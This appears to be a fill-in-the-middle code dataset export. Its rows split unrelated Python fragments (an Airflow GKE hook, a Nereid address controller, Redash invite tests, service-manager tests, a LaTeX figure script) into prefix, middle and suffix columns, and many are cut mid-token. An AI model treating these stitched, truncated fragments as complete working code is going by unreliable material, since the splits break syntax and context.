prefix stringlengths 0 918k | middle stringlengths 0 812k | suffix stringlengths 0 962k |
|---|---|---|
# Waver module __init__.py
"""
*******************************
WAVER
*******************************
This subpackage contains various utilities for WAVER,
the SuperDARN Wave Analysis Software Package.
DEV: functions/modules/classes with a * have not been developed yet
*******************************
"""
#import sigio
from music import *
#from signal import *
#from sigproc import *
#from compare import *
#from xcor import *
#
#
# *************************************************************
# Define a few general-use constants (WGS84 ellipsoid, kilometres)
# Mean Earth radius [km]
Re = 6371.0
# Polar Earth radius [km] (semi-minor axis)
# BUGFIX: value was previously 6378.1370, which is the equatorial radius.
RePol = 6356.7523
# Equatorial Earth radius [km] (semi-major axis)
# BUGFIX: was written `6,356.7523`, which Python parses as the tuple
# (6, 356.7523), not a float — and the value itself was the polar radius.
ReEqu = 6378.1370
|
ss = cls.__table__()
mechanism = ContactMechanism.__table__()
super(Address, cls).__register__(module_name)
# Migration from 2.8: move phone and email to contact mechanisms
for column in ['email', 'phone']:
if table.column_exist(column):
join = address.join(
party, condition=(party.id == address.party)
)
select = join.select(
address.create_date, address.create_uid,
address.write_date, address.write_uid,
As(Literal(column), 'type'),
As(Column(address, column), 'value'), address.party,
As(Literal(True), 'active'),
where=(Column(address, column) != '')
)
insert = mechanism.insert(
columns=[
mechanism.create_date,
mechanism.create_uid, mechanism.write_date,
mechanism.write_uid, mechanism.type,
mechanism.value, mechanism.party, mechanism.active,
], values=select)
cursor.execute(*insert)
table.column_rename(column, '%s_deprecated' % column)
@classmethod
def get_address_form(cls, address=None):
    """
    Build an initialised Address form that can be validated and used to
    create/update addresses.

    :param address: If an active record is provided it is used to autofill
                    the form.
    """
    if address:
        # An existing record was given: pre-populate every field from it.
        # Country/subdivision are stored by id; `and` guards against None.
        return AddressForm(
            request.form,
            name=address.name,
            street=address.street,
            streetbis=address.streetbis,
            zip=address.zip,
            city=address.city,
            country=address.country and address.country.id,
            subdivision=address.subdivision and address.subdivision.id,
            email=address.party.email,
            phone=address.party.phone,
        )
    # Fresh form: only the name can be prefilled, and only for a
    # logged-in (non-anonymous) user.
    if request.nereid_user.is_anonymous():
        prefill_name = ""
    else:
        prefill_name = request.nereid_user.display_name
    return AddressForm(request.form, name=prefill_name)
@classmethod
@route("/create-address", methods=["GET", "POST"])
@login_required
def create_address(cls):
    """
    Create an address for the current nereid_user.

    GET
    ~~~
    Return an address creation form

    POST
    ~~~~
    Creates an address and redirects to the address view. If a next_url
    is provided, redirects there.

    .. version_added: 3.0.3.0
    """
    form = cls.get_address_form()
    if request.method == 'POST' and form.validate():
        party = request.nereid_user.party
        # Create the address record owned by the current user's party.
        # Trailing comma unpack: create() returns a one-element list.
        address, = cls.create([{
            'name': form.name.data,
            'street': form.street.data,
            'streetbis': form.streetbis.data,
            'zip': form.zip.data,
            'city': form.city.data,
            'country': form.country.data,
            'subdivision': form.subdivision.data,
            'party': party.id,
        }])
        # Email and phone are stored on the party as contact mechanisms,
        # not on the address record itself; add only when provided.
        if form.email.data:
            party.add_contact_mechanism_if_not_exists(
                'email', form.email.data
            )
        if form.phone.data:
            party.add_contact_mechanism_if_not_exists(
                'phone', form.phone.data
            )
        return redirect(url_for('party.address.view_address'))
    try:
        return render_template('address-add.jinja', form=form)
    except TemplateNotFound:
        # The address-add template was introduced in 3.0.3.0,
        # so just raise a deprecation warning till 3.2.X and then
        # expect the use of the address-add template.
        warnings.warn(
            "address-add.jinja template not found. "
            "Will be required in future versions",
            DeprecationWarning
        )
        return render_template('address-edit.jinja', form=form)
@classmethod
@route("/save-new-address", methods=["GET", "POST"])
@route("/edit-address/<int:address>", methods=["GET", "POST"])
@login_required
def edit_address(cls, address=None):
    """
    Edit an Address.

    POST will update an existing address.
    GET will return a existing address edit form.

    .. version_changed:: 3.0.3.0

        For creating new address use the create_address handled instead of
        this one. The functionality would be deprecated in 3.2.X

    :param address: ID of the address
    """
    if address is None:
        # Deprecated creation path (the /save-new-address route) kept
        # for backward compatibility; delegates to create_address.
        warnings.warn(
            "Address creation will be deprecated from edit_address handler."
            " Use party.address.create_address instead",
            DeprecationWarning
        )
        return cls.create_address()
    form = cls.get_address_form()
    if address not in (a.id for a in request.nereid_user.party.addresses):
        # Check if the address is in the list of addresses of the
        # current user's party; reject foreign addresses outright.
        abort(403)
    # Rebind: `address` now holds the active record, not the integer id.
    address = cls(address)
    if request.method == 'POST' and form.validate():
        party = request.nereid_user.party
        cls.write([address], {
            'name': form.name.data,
            'street': form.street.data,
            'streetbis': form.streetbis.data,
            'zip': form.zip.data,
            'city': form.city.data,
            'country': form.country.data,
            'subdivision': form.subdivision.data,
        })
        # email/phone live on the party as contact mechanisms.
        if form.email.data:
            party.add_contact_mechanism_if_not_exists(
                'email', form.email.data
            )
        if form.phone.data:
            party.add_contact_mechanism_if_not_exists(
                'phone', form.phone.data
            )
        return redirect(url_for('party.address.view_address'))
    elif request.method == 'GET' and address:
        # Its an edit of existing address, prefill data
        form = cls.get_address_form(address)
    return render_template('address-edit.jinja', form=form, address=address)
@classmethod
@route("/view-address", methods=["GET"])
@login_required
def view_address(cls):
    """Render the address-book page for the logged-in user."""
    template_name = 'address.jinja'
    return render_template(template_name)
@route("/remove-address/<int:active_id>", methods=["POST"])
@login_required
def remove_address(self):
    """
    Make address inactive if user removes the address from address book.

    Note: this is a soft delete — the record is deactivated (active=False),
    not removed, even though the flash message says "deleted". Aborts with
    403 when the address does not belong to the current user's party.
    """
    if self.party == current_user.party:
        self.active = False
        self.save()
        flash(_('Address has been deleted successfully!'))
        if request.is_xhr:
            # AJAX callers get a JSON acknowledgement instead of a redirect.
            return jsonify(success=True)
        return redirect(request.referrer)
    abort(403)
class Party(ModelSQL, ModelView):
    "Party"
    __name__ = 'party.party'

    # Nereid web users associated with this party.
    nereid_users = fields.One2Many('nereid.user', 'party', 'Nereid Users')

    def add_contact_mechanism_if_not_exists(self, type, value):
        """
        Adds a contact mechanism to the party if it does not exist.

        :param type: mechanism type (e.g. 'email' or 'phone')
        :param value: mechanism value
        :return: The created contact mechanism or the one which existed
        """
        ContactMechanism = Pool().get('party.contact_mechanism')
        # Look for an identical mechanism before creating a duplicate.
        mechanisms = ContactMechanism.search([
            ('party', '=', self.id),
            ('type', '=', type),
            ('value', '=', value),
        ])
        if not mechanisms:
            mechanisms = ContactMechanism.create([{
                'party': self.id,
                'type': type,
                'value': value,
            }])
        return mechanisms[0]
class ContactMechanismForm(Form):
type = SelectField('Type', [validators.Required()])
value = TextField('Value', [validators.Required( |
import pytest
from waterbutler.providers.osfstorage.exceptions import OsfStorageQuotaExceededError
class TestExceptionSerialization:
    """Checks that provider exceptions survive the pickling contract."""

    @pytest.mark.parametrize(
        'exception_class',
        [OsfStorageQuotaExceededError],
    )
    def test_tolerate_dumb_signature(self, exception_class):
        """In order for WaterButlerError-inheriting exceptions to survive pickling/unpickling, it is
        necessary for them to be able to be instantiated with a single integer arg. The reasons for
        this are described in the docstring for `waterbutler.core.exceptions.WaterButlerError`.
        """
        try:
            i_live_but_why = exception_class(616)
        except Exception as exc:
            # Constructing with a bare int must never raise.
            pytest.fail(str(exc))
        assert isinstance(i_live_but_why, exception_class)
|
ngine Hook.
.. spelling::
gapic
enums
"""
import time
import warnings
from typing import Dict, Optional, Sequence, Union
from google.api_core.exceptions import AlreadyExists, NotFound
from google.api_core.gapic_v1.method import DEFAULT
from google.api_core.retry import Retry
# not sure why but mypy complains on missing `container_v1` but it is clearly there and is importable
from google.cloud import container_v1, exceptions # type: ignore[attr-defined]
from google.cloud.container_v1.gapic.enums import Operation
from google.cloud.container_v1.types import Cluster
from google.protobuf.json_format import ParseDict
from airflow import version
from airflow.exceptions import AirflowException
from airflow.providers.google.common.consts import CLIENT_INFO
from airflow.providers.google.common.hooks.base_google import PROVIDE_PROJECT_ID, GoogleBaseHook
# Seconds between successive GKE operation status polls (see
# GKEHook.wait_for_operation).
OPERATIONAL_POLL_INTERVAL = 15
class GKEHook(GoogleBaseHook):
"""
Hook for Google Kubernetes Engine APIs.
All the methods in the hook where project_id is used must be called with
keyword arguments rather than positional.
"""
def __init__(
    self,
    gcp_conn_id: str = "google_cloud_default",
    delegate_to: Optional[str] = None,
    location: Optional[str] = None,
    impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
) -> None:
    """Store connection settings; the GKE client itself is created lazily
    by :meth:`get_conn`."""
    super().__init__(
        gcp_conn_id=gcp_conn_id,
        delegate_to=delegate_to,
        impersonation_chain=impersonation_chain,
    )
    # Cached ClusterManagerClient, created on first get_conn() call.
    self._client = None
    # Google Cloud location (region/zone) used to build resource names.
    self.location = location
def get_conn(self) -> container_v1.ClusterManagerClient:
    """
    Returns ClusterManagerClient object.

    :rtype: google.cloud.container_v1.ClusterManagerClient
    """
    # Create the client once and cache it on the hook instance.
    if self._client is None:
        credentials = self._get_credentials()
        self._client = container_v1.ClusterManagerClient(credentials=credentials, client_info=CLIENT_INFO)
    return self._client
# To preserve backward compatibility
# TODO: remove one day
def get_client(self) -> container_v1.ClusterManagerClient:
    """Deprecated alias for :meth:`get_conn`."""
    warnings.warn(
        "The get_client method has been deprecated. You should use the get_conn method.",
        DeprecationWarning,
    )
    return self.get_conn()
def wait_for_operation(self, operation: Operation, project_id: Optional[str] = None) -> Operation:
    """
    Given an operation, continuously fetches the status from Google Cloud until either
    completion or an error occurring.

    :param operation: The Operation to wait for
    :param project_id: Google Cloud project ID; falls back to the hook's default
    :return: A new, updated operation fetched from Google Cloud
    :raises google.cloud.exceptions.GoogleCloudError: if the operation ends in
        any state other than DONE/RUNNING/PENDING
    """
    self.log.info("Waiting for OPERATION_NAME %s", operation.name)
    # Initial sleep gives the operation a chance to progress before polling.
    time.sleep(OPERATIONAL_POLL_INTERVAL)
    while operation.status != Operation.Status.DONE:
        if operation.status == Operation.Status.RUNNING or operation.status == Operation.Status.PENDING:
            time.sleep(OPERATIONAL_POLL_INTERVAL)
        else:
            # Any status other than DONE/RUNNING/PENDING is terminal failure.
            raise exceptions.GoogleCloudError(f"Operation has failed with status: {operation.status}")
        # To update status of operation
        operation = self.get_operation(operation.name, project_id=project_id or self.project_id)
    return operation
def get_operation(self, operation_name: str, project_id: Optional[str] = None) -> Operation:
    """
    Fetches the operation from Google Cloud.

    :param operation_name: Name of operation to fetch
    :param project_id: Google Cloud project ID; falls back to the hook's default
    :return: The new, updated operation from Google Cloud
    """
    # Operation names are fully qualified:
    #   projects/<project>/locations/<location>/operations/<name>
    return self.get_conn().get_operation(
        name=f'projects/{project_id or self.project_id}'
        + f'/locations/{self.location}/operations/{operation_name}'
    )
@staticmethod
def _append_label(cluster_proto: Cluster, key: str, val: str) -> Cluster:
    """
    Append a resource label to the provided Cluster protobuf.

    Labels must fit the regex ``[a-z]([-a-z0-9]*[a-z0-9])?``, so the
    ``.`` and ``+`` characters that appear in airflow version strings
    (semantic versioning: x.y.z) are mapped to ``-`` first.

    :param cluster_proto: The proto to append resource_label airflow
        version to
    :param key: The key label
    :param val: the raw label value; sanitised before being stored
    :return: The cluster proto updated with new label
    """
    # Single-pass character substitution: '.' -> '-', '+' -> '-'.
    sanitised = val.translate(str.maketrans('.+', '--'))
    cluster_proto.resource_labels.update({key: sanitised})
    return cluster_proto
@GoogleBaseHook.fallback_to_default_project_id
def delete_cluster(
    self,
    name: str,
    project_id: str = PROVIDE_PROJECT_ID,
    retry: Retry = DEFAULT,
    timeout: float = DEFAULT,
) -> Optional[str]:
    """
    Deletes the cluster, including the Kubernetes endpoint and all
    worker nodes. Firewalls and routes that were configured during
    cluster creation are also deleted. Other Google Compute Engine
    resources that might be in use by the cluster (e.g. load balancer
    resources) will not be deleted if they were not present at the
    initial create time.

    :param name: The name of the cluster to delete
    :param project_id: Google Cloud project ID
    :param retry: Retry object used to determine when/if to retry requests.
        If None is specified, requests will not be retried.
    :param timeout: The amount of time, in seconds, to wait for the request to
        complete. Note that if retry is specified, the timeout applies to each
        individual attempt.
    :return: The full url to the delete operation if successful, else None
    """
    self.log.info("Deleting (project_id=%s, location=%s, cluster_id=%s)", project_id, self.location, name)
    try:
        resource = self.get_conn().delete_cluster(
            name=f'projects/{project_id}/locations/{self.location}/clusters/{name}',
            retry=retry,
            timeout=timeout,
        )
        # Block until the long-running delete operation completes.
        resource = self.wait_for_operation(resource)
        # Returns server-defined url for the resource
        return resource.self_link
    except NotFound as error:
        # Cluster already gone: treat deletion as a success, return None.
        self.log.info('Assuming Success: %s', error.message)
        return None
@GoogleBaseHook.fallback_to_default_project_id
def create_cluster(
self,
cluster: Union[Dict, Cluster],
project_id: str = PROVIDE_PROJECT_ID,
retry: Retry = DEFAULT,
timeout: float = DEFAULT,
) -> str:
"""
Creates a cluster, consisting of the specified number and type of Google Compute
Engine instances.
:param cluster: A Cluster protobuf or dict. If dict is provided, it must
be of the same form as the protobuf message
:class:`google.cloud.container_v1.types.Cluster`
:param project_id: Google Cloud project ID
:param retry: A retry object (``google.api_core.retry.Retry``) used to
retry requests.
If None is specified, requests will not be retried.
:param timeout: The amount of time, in seconds, to wait for the request to
complete. Note that if retry is specified, the timeout applies to each
individual attempt.
:return: The full url to the new, or existing, cluster
:raises:
ParseError: On JSON parsing problems when trying to convert dict
AirflowException: cluster is not dict type nor Cluster proto type
"""
if isinstance(cluster, dict):
cluster_proto = Cluster()
cluster = ParseDict(cluster, cluster_proto)
elif not isinstance(cluster, Cluster):
raise Airflo | wException("cluste | r is not instance of Cluster proto or python dict")
self._append_label(cluster, 'airflow-version', 'v' + version.version)
self.log.info(
"Creating (project_id=%s, location=%s, cluster_name=%s)", project_id, self.location, cluster.name
)
try:
reso |
import asyncio
import logging
import os
import signal
from collections import defaultdict
import aiohttp.web
from aiohttp_index import Index | Middleware
logger = logging.getLogger('rc-car.vechicle')
class Vechicle:
    """RC-car vehicle server.

    Aggregates components (which register commands, sensors and parameter
    getters on this object) and serves them through an aiohttp web
    application.

    NOTE(review): the class name keeps the original 'Vechicle' spelling —
    renaming it would break external callers.

    BUGFIX: the constructor was garbled as ``def _ _init__`` (broken
    token); restored to ``__init__``.
    """

    # NOTE(review): currently unused — __init__ dereferences cfg.model
    # directly, so cfg must not be None; confirm intended fallback.
    DEFAULT_CFG = {}

    def __init__(self, cfg=None, loop=None):
        """
        :param cfg: configuration object with ``.model`` and ``.server`` sections
        :param loop: asyncio event loop (defaults to the current event loop)
        """
        self.loop = loop or asyncio.get_event_loop()
        self.cfg = cfg
        if self.cfg.model.use_mock:
            # Force gpiozero onto mock pins so the server can run on a
            # machine without real GPIO hardware.
            logger.info('Use mock-factory...')
            os.environ['GPIOZERO_PIN_FACTORY'] = 'mock'
            from gpiozero.pins.mock import MockPWMPin
            from gpiozero import Device
            Device.pin_factory.pin_class = MockPWMPin
        # Registries populated by components via add_component/register.
        self.commands = defaultdict(list)
        self.sensors = defaultdict(list)
        self.parameters = defaultdict(list)
        self.components = {}
        self.init_signals()
        self.init_aiohttp_app()

    def init_signals(self):
        """Install SIGINT/SIGTERM -> stop and SIGHUP -> reload handlers."""
        for sig in ('SIGINT', 'SIGTERM'):
            self.loop.add_signal_handler(getattr(signal, sig), self.stop)
        self.loop.add_signal_handler(signal.SIGHUP, self.reload)
        signal.siginterrupt(signal.SIGTERM, False)

    def init_aiohttp_app(self):
        """Create the aiohttp application with index-serving middleware."""
        self.aiohttp_app = aiohttp.web.Application(
            loop=self.loop,
            middlewares=[
                IndexMiddleware()
            ]
        )
        # Give request handlers a back-reference to this server object.
        self.aiohttp_app['server'] = self

    def stop(self):
        """Schedule a graceful shutdown of the HTTP server and event loop."""
        logger.info('Stopping server...')

        async def stop():
            app = self.aiohttp_app
            if 'http' in app:
                # Close the listening socket first, then drain handlers.
                srv = app['http']['srv']
                handler = app['http']['handler']
                srv.close()
                await srv.wait_closed()
                await handler.shutdown(self.cfg.server.shutdown_timeout)
            await app.shutdown()
            await app.cleanup()
            self.loop.stop()
        return self.loop.create_task(stop())

    def reload(self):
        """SIGHUP handler; currently only logs the signal."""
        logger.info('Handle SIGHUP')

    def add_component(self, name, component):
        """Register a component; it wires itself into the command/sensor/
        parameter registries via ``component.register(self)``."""
        component.register(self)
        self.components[name] = component

    def get_state(self):
        """Snapshot current sensor and parameter values by invoking each
        registered zero-argument getter."""
        sensors = {
            name: value()
            for name, value in self.sensors.items()
        }
        parameters = {
            name: value()
            for name, value in self.parameters.items()
        }
        return {
            'sensors': sensors,
            'parameters': parameters
        }

    def run_forever(self):
        """Start the HTTP server on cfg.server.host/port and run the event
        loop until stop() is called."""
        async def init():
            handler = self.aiohttp_app.make_handler()
            srv = await self.loop.create_server(
                handler,
                host=self.cfg.server.host,
                port=self.cfg.server.port,
                backlog=self.cfg.server.backlog
            )
            # Kept so stop() can close the socket and drain the handler.
            self.aiohttp_app['http'] = {
                'handler': handler,
                'srv': srv
            }
        self.loop.run_until_complete(init())
        logger.info(
            'Service started on %s:%s with pid %s',
            self.cfg.server.host, self.cfg.server.port, os.getpid())
        try:
            self.loop.run_forever()
        finally:
            logger.info('Server was stopped')
|
#!/usr/bin/env python
"Module to aggregate all pdf figures of a directory \
into a single latex file, and compile it."
from __future__ import division, | print_function
import os
import sys
import re
from optparse import OptionParser
_VERSION = '1.0'
def latex_dir(outfile_name, directory, column=2, eps=False):
    """Write a latex source file including every pdf (or eps) figure found
    in *directory*, laid out in 1 or 2 subfigure columns.

    :param outfile_name: path of the .tex file to write
    :param directory: directory (relative to the cwd) scanned for figures
    :param column: number of subfigure columns, 1 or 2
    :param eps: if True include .eps files (plain latex), else .pdf
    :raises ValueError: if column is not 1 or 2

    BUGFIX: the template's format key was garbled
    (``%(include_ pdf_package_option)s``), LOGNAME being unset crashed the
    header, and error paths used bare ``raise`` outside any except clause
    (which raises an unrelated RuntimeError).
    """
    print(directory)
    with open(outfile_name, 'w') as outfile:
        outfile.write(r"""\documentclass[10pt]{article}
\usepackage[T1]{fontenc}
\usepackage[utf8x]{inputenc}
\usepackage{fancyhdr}
\def\goodgap{\hspace{\subfigtopskip}\hspace{\subfigbottomskip}}
\usepackage%(include_pdf_package_option)s{graphicx}
\usepackage{subfigure,a4wide}
%%set dimensions of columns, gap between columns, and paragraph indent
\setlength{\textheight}{8in}
%%\setlength{\textheight}{9.3in}
\setlength{\voffset}{0.5in}
\setlength{\topmargin}{-0.55in}
%%\setlength{\topmargin}{0in}
\setlength{\headheight}{12.0pt}
%%\setlength{\headsep}{0.0in}
%%\setlength{\textwidth}{7.43in}
\setlength{\textwidth}{7.10in}
%%\setlength{\textwidth}{6in}
\setlength{\hoffset}{-0.4in}
\setlength{\columnsep}{0.25in}
\setlength{\oddsidemargin}{0.0in}
\setlength{\evensidemargin}{0.0in}
%% more than .95 of text and figures
\def\topfraction{.95}
\def\floatpagefraction{.95}
\def\textfraction{.05}
\newcommand{\mydefaultheadersandfooters}
{
\chead{\today}
\rhead{\thepage}
\lfoot{}
\cfoot{}
\rfoot{}
}
\title{Automatically generated latex for directory %(title)s}
\author{%(login)s}
\begin{document}
\pagestyle{fancy}
\mydefaultheadersandfooters
\maketitle
\clearpage
""" % {'title': directory.replace('_', r'\_'),
       # LOGNAME may be unset (e.g. in cron/CI); fall back gracefully.
       'login': (os.getenv('LOGNAME') or 'unknown').capitalize(),
       'include_pdf_package_option': '' if eps else '[pdftex]'})
        files = os.listdir(os.getcwd() + '/' + directory)
        # Skip this script's own generated output files.
        exclude_filename = 'latex_dir_'
        pattern = re.compile(r'(?!%s)\S+\.%s' % (exclude_filename,
                                                 ('eps' if eps else 'pdf')))
        count = 0
        if column == 1:
            line_size = .99
        elif column == 2:
            line_size = .49
        else:
            raise ValueError("invalid column size: %r" % (column,))
        nb_floats = 0
        for cur_file in sorted(files):
            if pattern.match(cur_file):
                nb_floats += 1
                # Open a figure environment at the start of each row.
                if column == 1 or count % 2 == 0:
                    outfile.write(r"\begin{figure}[!ht]"
                                  r"\begin{center}")
                outfile.write(r"\subfigure[]{\includegraphics" +
                              r"[width=%f\textwidth,height=%f\textheight]{%s/%s}}"
                              % (line_size, .7 * line_size, directory, cur_file))
                # Close the figure at the end of each row.
                if column == 1 or count % 2 != 0:
                    outfile.write('\n' + r"\caption{}\end{center}\end{figure}"
                                  + '\n')
                    if nb_floats >= 4:
                        # Flush floats regularly so latex does not choke.
                        outfile.write(r"\clearpage")
                        nb_floats = 0
                elif count % 2 == 0:
                    # outfile.write('\goodgap')
                    pass
                else:
                    raise AssertionError(
                        "Double column and modulo is not working on count: %d"
                        % count)
                count += 1
        if count % 2 == 1:
            # Odd number of figures: the last figure is still open.
            outfile.write('\n' + r"\caption{}\end{center}\end{figure}" + '\n')
        outfile.write(r"\end{document}")
def main():
    """Parse command-line options and run latex_dir on each directory.

    Note: os.execlp replaces the current process with (pdf)latex, so on
    success only the first directory's tex file is actually compiled.
    """
    usage = "%prog [-c nb_of_columns -w outtexfile] directory_list"
    parser = OptionParser(usage = usage)
    parser.add_option('-w', dest='outtexfile', type='string',
                      help='output latex file (default is dir/latex_dir.tex)')
    parser.add_option('-c', dest='column', type='int', default = 2,
                      help='number of columns of latex file: 1 or 2')
    parser.add_option('--eps', dest='eps', default=False, action='store_true',
                      help='use eps files instead of pdf')
    (options, args) = parser.parse_args()
    if not args:
        parser.print_help()
        exit(5)
    for directory in args:
        if not options.outtexfile:
            # Default output name: <dir>/latex_dir_<dir>.tex
            outfile_name = os.sep.join((directory,
                                        'latex_dir_%s.tex' % directory))
        else:
            outfile_name = options.outtexfile
        if options.column not in (1, 2):
            print("invalid number of columns")
            parser.print_help()
            exit(5)
        latex_dir(outfile_name, directory, options.column, eps=options.eps)
        # Compile the tex file; execlp does not return on success.
        if options.eps:
            os.execlp('latex', 'latex', '-interaction=nonstopmode',
                      '-output-directory', directory, outfile_name)
        else:
            os.execlp('pdflatex', 'pdflatex', '-interaction=nonstopmode',
                      '-output-directory', directory, outfile_name)
if __name__ == '__main__':
sys.exit(main())
|
from tests import BaseTestCase
import mock
import time
from redash.models import User
from redash.authentication.account import invite_token
from tests.handlers import get_request, post_request
class TestInvite(BaseTestCase):
    """GET /invite/<token>: validating invite tokens."""

    def test_expired_invite_token(self):
        # Tokens embed a signing timestamp; back-date time.time() to just
        # over seven days ago so the generated token is already expired.
        with mock.patch('time.time') as patched_time:
            patched_time.return_value = time.time() - (7 * 24 * 3600) - 10
            token = invite_token(self.factory.user)
        response = get_request('/invite/{}'.format(token), org=self.factory.org)
        self.assertEqual(response.status_code, 400)

    def test_invalid_invite_token(self):
        response = get_request('/invite/badtoken', org=self.factory.org)
        self.assertEqual(response.status_code, 400)

    def test_valid_token(self):
        token = invite_token(self.factory.user)
        response = get_request('/invite/{}'.format(token), org=self.factory.org)
        # BUGFIX: status literal was garbled ('2 | 00') in the source.
        self.assertEqual(response.status_code, 200)

    def test_already_active_user(self):
        # TODO: not implemented yet.
        pass
class TestInvitePost(BaseTestCase):
    """POST /invite/<token>: setting the password for an invited user."""

    def test_empty_password(self):
        # Blank passwords must be rejected.
        token = invite_token(self.factory.user)
        response = post_request('/invite/{}'.format(token), data={'password': ''}, org=self.factory.org)
        self.assertEqual(response.status_code, 400)

    def test_invalid_password(self):
        # Too-short passwords (4 chars here) must be rejected.
        token = invite_token(self.factory.user)
        response = post_request('/invite/{}'.format(token), data={'password': '1234'}, org=self.factory.org)
        self.assertEqual(response.status_code, 400)

    def test_bad_token(self):
        response = post_request('/invite/{}'.format('jdsnfkjdsnfkj'), data={'password': '1234'}, org=self.factory.org)
        self.assertEqual(response.status_code, 400)

    def test_already_active_user(self):
        # TODO: not implemented yet.
        pass

    def test_valid_password(self):
        # A valid password activates the account (302 redirect) and is
        # persisted so it verifies afterwards.
        token = invite_token(self.factory.user)
        password = 'test1234'
        response = post_request('/invite/{}'.format(token), data={'password': password}, org=self.factory.org)
        self.assertEqual(response.status_code, 302)
        self.factory.user = User.get_by_id(self.factory.user.id)
        self.assertTrue(self.factory.user.verify_password(password))
|
start_and_wait(
service_resolver, context, [servicetostart], True, False, False, None, port, secondsToWait, append_args,
)
self.assertIsNotNone(context.get_service(servicetostart).status())
context.kill(servicetostart, True)
self.assertEqual(context.get_service(servicetostart).status(), [])
def test_play_from_default_run_from_source(self):
    """Start a Play service configured to default to run-from-source,
    verify it reports a status, then kill it and check it is gone."""
    sm_application = SmApplication(self.config_dir_override)
    context = SmContext(sm_application, None, False, False)
    service_resolver = ServiceResolver(sm_application)
    servicetostart = "PLAY_NEXUS_END_TO_END_DEFAULT_SOURCE_TEST"
    port = None
    secondsToWait = 90
    append_args = None
    actions.start_and_wait(
        service_resolver, context, [servicetostart], False, False, False, None, port, secondsToWait, append_args,
    )
    self.assertIsNotNone(context.get_service(servicetostart).status())
    context.kill(servicetostart, True)
    # An empty status list means no running process remains.
    self.assertEqual(context.get_service(servicetostart).status(), [])
def test_play_from_source_default(self):
    """Start a Play service with default flags, verify status, then kill
    it and check nothing remains running."""
    sm_application = SmApplication(self.config_dir_override)
    context = SmContext(sm_application, None, False, False)
    service_resolver = ServiceResolver(sm_application)
    servicetostart = "PLAY_NEXUS_END_TO_END_TEST"
    port = None
    secondsToWait = 90
    append_args = None
    actions.start_and_wait(
        service_resolver, context, [servicetostart], False, False, False, None, port, secondsToWait, append_args,
    )
    self.assertIsNotNone(context.get_service(servicetostart).status())
    context.kill(servicetostart, True)
    self.assertEqual(context.get_service(servicetostart).status(), [])
def test_successful_play_from_jar_without_waiting(self):
    """Start a Play service from its fat jar with no wait timeout; the
    fake Nexus serves the artifact. Always clean up in finally."""
    sm_application = SmApplication(self.config_dir_override)
    context = SmContext(sm_application, None, False, False)
    service_resolver = ServiceResolver(sm_application)
    context.kill_everything(True)
    self.startFakeNexus()
    fatJar = True
    release = False
    proxy = None
    port = None
    # None: do not block waiting for the service to become healthy.
    seconds_to_wait = None
    append_args = None
    try:
        servicetostart = ["PLAY_NEXUS_END_TO_END_TEST"]
        actions.start_and_wait(
            service_resolver,
            context,
            servicetostart,
            False,
            fatJar,
            release,
            proxy,
            port,
            seconds_to_wait,
            append_args,
        )
    finally:
        context.kill_everything(True)
def test_successful_play_default_run_from_jar_without_waiting(self):
    """Start a Play service whose default run mode is fat-jar, without
    waiting for readiness; clean up in finally."""
    sm_application = SmApplication(self.config_dir_override)
    context = SmContext(sm_application, None, False, False)
    service_resolver = ServiceResolver(sm_application)
    context.kill_everything(True)
    self.startFakeNexus()
    source = False
    fatJar = True
    release = False
    proxy = None
    port = None
    seconds_to_wait = None
    append_args = None
    try:
        servicetostart = ["PLAY_NEXUS_END_TO_END_DEFAULT_JAR_TEST"]
        actions.start_and_wait(
            service_resolver,
            context,
            servicetostart,
            source,
            fatJar,
            release,
            proxy,
            port,
            seconds_to_wait,
            append_args,
        )
    finally:
        context.kill_everything(True)
def test_successful_play_from_jar_without_waiting_with_append_args(self):
    """Start a Play service with extra JVM args appended and verify the
    spawned process command line actually contains them."""
    sm_application = SmApplication(self.config_dir_override)
    context = SmContext(sm_application, None, False, False)
    service_resolver = ServiceResolver(sm_application)
    context.kill_everything(True)
    self.startFakeNexus()
    servicetostart = ["PLAY_NEXUS_END_TO_END_TEST"]
    appendArgs = {"PLAY_NEXUS_END_TO_END_TEST": ["-DFoo=Bar"]}
    fatJar = True
    release = False
    proxy = None
    port = None
    seconds_to_wait = None
    actions.start_and_wait(
        service_resolver, context, servicetostart, False, fatJar, release, proxy, port, seconds_to_wait, appendArgs,
    )
    service = SmPlayService(context, "PLAY_NEXUS_END_TO_END_TEST")
    # Poll until exactly one matching process exists, then inspect args.
    self.waitForCondition(lambda: len(SmProcess.processes_matching(service.pattern)), 1)
    processes = SmProcess.processes_matching(service.pattern)
    self.assertTrue("-DFoo=Bar" in processes[0].args)
def test_failing_play_from_jar(self):
    """A broken project must fail to start within the short wait window
    and raise ServiceManagerException with a timeout message."""
    sm_application = SmApplication(self.config_dir_override)
    context = SmContext(sm_application, None, False, False)
    service_resolver = ServiceResolver(sm_application)
    context.kill_everything(True)
    self.startFakeNexus()
    try:
        servicetostart = ["BROKEN_PLAY_PROJECT"]
        actions.start_and_wait(
            service_resolver,
            context,
            servicetostart,
            source=False,
            fatjar=True,
            release=False,
            proxy=None,
            port=None,
            seconds_to_wait=2,
            append_args=None,
        )
        self.fail("Did not expect the project to startup.")
    except ServiceManagerException as sme:
        self.assertEqual("Timed out starting service(s): BROKEN_PLAY_PROJECT", sme.args[0])
    finally:
        context.kill_everything(True)
def test_start_and_stop_one_duplicate(self):
    """Starting an already-running service must be a no-op: start_one
    returns False for the duplicate attempt."""
    sm_application = SmApplication(self.config_dir_override)
    context = SmContext(sm_application, None, False, False)
    service_resolver = ServiceResolver(sm_application)
    actions.start_and_wait(
        service_resolver,
        context,
        ["TEST_ONE"],
        False,
        False,
        False,
        None,
        port=None,
        seconds_to_wait=90,
        append_args=None,
    )
    self.assertIsNotNone(context.get_service("TEST_ONE").status())
    # Second start of the same service should be refused.
    result = actions.start_one(context, "TEST_ONE", False, True, False, None, port=None)
    self.assertFalse(result)
    context.kill("TEST_ONE", True)
    self.assertEqual(context.get_service("TEST_ONE").status(), [])
def test_assets_server(self):
    """Start the assets frontend via start_one (fake Artifactory supplies
    the artifact), then kill it and verify it is gone."""
    context = SmContext(SmApplication(self.config_dir_override), None, False, False)
    context.kill_everything(True)
    self.startFakeArtifactory()
    actions.start_one(
        context, "PYTHON_SIMPLE_SERVER_ASSETS_FRONTEND", False, True, False, None, port=None,
    )
    self.assertIsNotNone(context.get_service("PYTHON_SIMPLE_SERVER_ASSETS_FRONTEND").status())
    context.kill("PYTHON_SIMPLE_SERVER_ASSETS_FRONTEND", wait=True)
    self.assertEqual(context.get_service("PYTHON_SIMPLE_SERVER_ASSETS_FRONTEND").status(), [])
